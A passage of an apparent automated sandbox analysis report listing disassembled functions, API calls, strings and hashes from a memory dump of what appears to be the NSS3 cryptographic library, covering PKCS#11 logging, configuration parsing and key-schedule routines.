API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: c135ada4d5631a23059e35de5f1429dd132b3254ffbd1b2d6a3d185d054d6df1
Instruction ID: 3a6e966f6fad2ba2b6432c7a4f97ca28f74c3f80166928dd962cd570f2ab768f
Opcode Fuzzy Hash: c135ada4d5631a23059e35de5f1429dd132b3254ffbd1b2d6a3d185d054d6df1
Instruction Fuzzy Hash: D651C831506126ABDB218F549F4CFAA37B6AB4230CF046476F50DABA13D738A858C7D1

Function 6C764C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764C5B
PR_smprintf.NSS3(6C83AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C764CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C764CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C764D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C764D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C764DA2
free.MOZGLUE(?), ref: 6C764DB9
free.MOZGLUE(00000000), ref: 6C764DCF

Strings

0x%08lx=[%s %s], xrefs: 6C764D80
rootFlags, xrefs: 6C764D47
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C764D9D
every, xrefs: 6C764CA1
slotFlags, xrefs: 6C764D34
%s,%s, xrefs: 6C764C4B
ootT, xrefs: 6C764D1A
rust, xrefs: 6C764D22
any, xrefs: 6C764C96
timeout, xrefs: 6C764C91

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 929e4a180db0324d926b0607c965fd00d079cf4b2cff79f8e8df7d11da6997cb
Instruction ID: b3e020d9dd0c59cb4d87edcef50044eacd49febd3d02028fdb427e00ba5f9319
Opcode Fuzzy Hash: 929e4a180db0324d926b0607c965fd00d079cf4b2cff79f8e8df7d11da6997cb
Instruction Fuzzy Hash: BE4189B1D00141ABDB22DF5ADE45ABB3A65AB8630CF484534EC1A0BF02E731D828D7D3

Function 6C746910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON

Download Yara Rule

APIs

NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C746943

Part of subcall function 6C764210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,BAEEE052,flags,?,00000000,?,6C745947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C764220
Part of subcall function 6C764210: NSSUTIL_ArgGetParamValue.NSS3(?,GYtl,?,?,?,?,?,?,00000000,?,00000000,?,6C747703,?,00000000,00000000), ref: 6C76422D
Part of subcall function 6C764210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C747703), ref: 6C76424B
Part of subcall function 6C764210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C747703,?,00000000), ref: 6C764272

NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C746957
NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C746972
NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C746983

Part of subcall function 6C763EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C73C79F,?,6C746247,70E85609,?,?,6C73C79F,6C74781D,?,6C73BD52,00000001,70E85609,D85D8B04,?), ref: 6C763EB8

PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7469AA
PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7469BE
PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7469D2
NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7469DF

Part of subcall function 6C764020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,766B4C80,?,6C7650B7,?), ref: 6C764041

free.MOZGLUE(00000000), ref: 6C7469F6
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C746A04
free.MOZGLUE(00000000), ref: 6C746A1B
NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C746A29
free.MOZGLUE(00000000), ref: 6C746A3F
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C746A4D
NSSUTIL_ArgStrip.NSS3(?), ref: 6C746A5B

Strings

nokeydb, xrefs: 6C746968
certPrefix=, xrefs: 6C7469B8
configdir=, xrefs: 6C7469A4
nocertdb, xrefs: 6C746951
readOnly, xrefs: 6C74693D
keyPrefix=, xrefs: 6C7469CC
flags, xrefs: 6C746937, 6C746942, 6C746956, 6C74696D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
API String ID: 2065226673-2785624044
Opcode ID: e2c4b25c8a03126e9cbaa4f48399ee1b6c9cdef020dba5331a67e15be107e9bb
Instruction ID: c3458731bf738d1127ac6ef73842d63790d18f0bba2e1e556e50679488aa809e
Opcode Fuzzy Hash: e2c4b25c8a03126e9cbaa4f48399ee1b6c9cdef020dba5331a67e15be107e9bb
Instruction Fuzzy Hash: 514192F1A402056BE710DB65AE89B5B36ACAF1534CF184830ED09E6B02F735DA18C7A2

Function 6C746CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C746910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C746943
Part of subcall function 6C746910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C746957
Part of subcall function 6C746910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C746972
Part of subcall function 6C746910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C746983
Part of subcall function 6C746910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7469AA
Part of subcall function 6C746910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7469BE
Part of subcall function 6C746910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7469D2
Part of subcall function 6C746910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7469DF
Part of subcall function 6C746910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C746A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C746D8C
free.MOZGLUE(00000000), ref: 6C746DC5
free.MOZGLUE(?), ref: 6C746DD6
free.MOZGLUE(?), ref: 6C746DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C746E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C746E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C746E72
free.MOZGLUE(?), ref: 6C746EA7
free.MOZGLUE(?), ref: 6C746EC4
free.MOZGLUE(?), ref: 6C746ED5
free.MOZGLUE(00000000), ref: 6C746EE3
free.MOZGLUE(?), ref: 6C746EF4
free.MOZGLUE(?), ref: 6C746F08
free.MOZGLUE(00000000), ref: 6C746F35
free.MOZGLUE(?), ref: 6C746F44
free.MOZGLUE(?), ref: 6C746F5B
free.MOZGLUE(00000000), ref: 6C746F65

Part of subcall function 6C746C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C74781D,00000000,6C73BE2C,?,6C746B1D,?,?,?,?,00000000,00000000,6C74781D), ref: 6C746C40
Part of subcall function 6C746C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C74781D,?,6C73BE2C,?), ref: 6C746C58
Part of subcall function 6C746C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C74781D), ref: 6C746C6F
Part of subcall function 6C746C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C746C84
Part of subcall function 6C746C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C746C96
Part of subcall function 6C746C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C746CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C746F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C746FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C746FF4

Strings

+`ul, xrefs: 6C746D0D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`ul
API String ID: 1304971872-149724355
Opcode ID: ba7b43eb22fdb655eed3cdf8ebc625b8e5fb97716ffe7b8d499c79f8644ea67a
Instruction ID: 8e028db3aef966e97892b46853b994a0bef8a64abe75329dc474614a6ffe7d07
Opcode Fuzzy Hash: ba7b43eb22fdb655eed3cdf8ebc625b8e5fb97716ffe7b8d499c79f8644ea67a
Instruction Fuzzy Hash: 28B182B4E012199FEF11CBA5DA45B9E7BF9BF09348F148035E815E7A01E735EA04CBA1

Function 6C734950 Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 170COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_CopyObject), ref: 6C734976
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7349A7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7349B6

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7349CC
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C7349FA
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C734A09
PR_LogPrint.NSS3(?,00000000), ref: 6C734A1F
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C734A40
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C734A5C
PR_LogPrint.NSS3( phNewObject = 0x%p,?), ref: 6C734A7C
PL_strncpyz.NSS3(?, *phNewObject = 0x%x,00000050), ref: 6C734B17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C734B26
PR_LogPrint.NSS3(?,00000000), ref: 6C734B3C

Strings

*phNewObject = 0x%x, xrefs: 6C734B01, 6C734B11
hSession = 0x%x, xrefs: 6C734991, 6C7349A1
(CK_INVALID_HANDLE), xrefs: 6C7349AF, 6C734A02, 6C734B1F
phNewObject = 0x%p, xrefs: 6C734A77
pTemplate = 0x%p, xrefs: 6C734A39
hObject = 0x%x, xrefs: 6C7349E4, 6C7349F4
ulCount = %d, xrefs: 6C734A57
C_CopyObject, xrefs: 6C734971

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phNewObject = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ phNewObject = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_CopyObject
API String ID: 1003633598-1222337137
Opcode ID: 6abb7381304c588136133c796382ca8e7c5c01bf1fb100d0808f52c04a36944b
Instruction ID: e3376ff7fd1f8d15d6d96cdb2fc3e0dad1ed67c8b038c9d3d81344e47edaf5c4
Opcode Fuzzy Hash: 6abb7381304c588136133c796382ca8e7c5c01bf1fb100d0808f52c04a36944b
Instruction Fuzzy Hash: D851F531605125ABDB24CB148F4CF6A7BB9AB4230CF046474F8096BB02C739AC58DBE6

Function 6C7308F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C73094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C730953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C73096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C730974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C73098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C730995

Part of subcall function 6C731800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C731860
Part of subcall function 6C731800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C7309BF), ref: 6C731897
Part of subcall function 6C731800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7318AA
Part of subcall function 6C731800: memcpy.VCRUNTIME140(?,?,?), ref: 6C7318C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C730B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C730B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C730B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C730B78

Strings

key, xrefs: 6C730ACB
secret, xrefs: 6C730A88
base_nonce, xrefs: 6C730B06
exp, xrefs: 6C730B36
info_hash, xrefs: 6C7309E0
psk_id_hash, xrefs: 6C7309B5

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
API String ID: 1637529542-763765719
Opcode ID: 75d02790f61eebf291efa441466bb1f3eb221a66b14f6b830cda8c40fc977d09
Instruction ID: 9ae73dda1573540c4523ad8059914fc7e2081cc7491a9a376f89d25520398603
Opcode Fuzzy Hash: 75d02790f61eebf291efa441466bb1f3eb221a66b14f6b830cda8c40fc977d09
Instruction Fuzzy Hash: 79818A75604315AFC710CF54C984A9AF7E8FF88618F048929F99987B52E730E919CB92

Function 6C7389B0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 149COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKey), ref: 6C7389D6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C738A04
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C738A13

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C738A29
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C738A4B
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C738A67
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C738A83
PR_LogPrint.NSS3( phKey = 0x%p,?), ref: 6C738AA1
PL_strncpyz.NSS3(?, *phKey = 0x%x,00000050), ref: 6C738B43
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C738B52
PR_LogPrint.NSS3(?,00000000), ref: 6C738B68

Strings

hSession = 0x%x, xrefs: 6C7389EE, 6C7389FE
(CK_INVALID_HANDLE), xrefs: 6C738A0C, 6C738B4B
*phKey = 0x%x, xrefs: 6C738B2D, 6C738B3D
pMechanism = 0x%p, xrefs: 6C738A46
C_GenerateKey, xrefs: 6C7389D1
pTemplate = 0x%p, xrefs: 6C738A62
ulCount = %d, xrefs: 6C738A7E
phKey = 0x%p, xrefs: 6C738A9C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pTemplate = 0x%p$ phKey = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKey
API String ID: 1003633598-2039122979
Opcode ID: e178123c56cfba36b5c5f9ecbc3d651038838055b6ae749fc6184a0f66188aae
Instruction ID: 6ac954ae383aebc8199125ec4c8b7ef37978002a4aeb43002557c2dd95ce42ee
Opcode Fuzzy Hash: e178123c56cfba36b5c5f9ecbc3d651038838055b6ae749fc6184a0f66188aae
Instruction Fuzzy Hash: 1151A430605115ABDB20DF19DF8CEAB37B5AB4234CF045476F809ABB12D738A859CBD6

Function 6C742D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C742DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C742E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C742E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C742E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C714F1C,?,-00000001,00000000,?), ref: 6C742E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C714F1C,?,-00000001,00000000), ref: 6C742E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C742EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C742EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C742EF8
PR_Unlock.NSS3(?), ref: 6C742F62
TlsGetValue.KERNEL32 ref: 6C742F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C742F9E
PR_Unlock.NSS3(?), ref: 6C742FCA
TlsGetValue.KERNEL32 ref: 6C74301A
EnterCriticalSection.KERNEL32(?), ref: 6C74302E
PR_Unlock.NSS3(?), ref: 6C743066
PR_SetError.NSS3(00000000,00000000), ref: 6C743085
PR_Unlock.NSS3(?), ref: 6C7430EC
TlsGetValue.KERNEL32 ref: 6C74310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C743124
PR_Unlock.NSS3(?), ref: 6C74314C

Part of subcall function 6C729180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C75379E,?,6C729568,00000000,?,6C75379E,?,00000001,?), ref: 6C72918D
Part of subcall function 6C729180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C75379E,?,6C729568,00000000,?,6C75379E,?,00000001,?), ref: 6C7291A0

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

PR_SetError.NSS3(00000000,00000000), ref: 6C74316D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: f2e4eef44b5bfbc992bf16197c2fb5e1701c9e9118a417ac9e894869d32b1b01
Instruction ID: ad52e606442738fb69f9cbd3010cb15feba9226b7a46cc4366883fff21151961
Opcode Fuzzy Hash: f2e4eef44b5bfbc992bf16197c2fb5e1701c9e9118a417ac9e894869d32b1b01
Instruction Fuzzy Hash: C5F1ACB1D00619AFDF10DF64D988BADBBB5BF09318F548169EC08A7711E731E895CB81

Function 6C73AF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C73AF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C73AF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C73AF83

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C73AF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C73AFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C73AFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C73AFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C73B00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C73B028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C73B041

Strings

hSession = 0x%x, xrefs: 6C73AF5E, 6C73AF6E
pulSignatureLen = 0x%p, xrefs: 6C73B03C
(CK_INVALID_HANDLE), xrefs: 6C73AF7C
pData = 0x%p, xrefs: 6C73AFEF
ulDataLen = %d, xrefs: 6C73B00A
C_SignMessage, xrefs: 6C73AF41
pParameter = 0x%p, xrefs: 6C73AFB9
ulParameterLen = 0x%p, xrefs: 6C73AFD4
pSignature = 0x%p, xrefs: 6C73B023

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
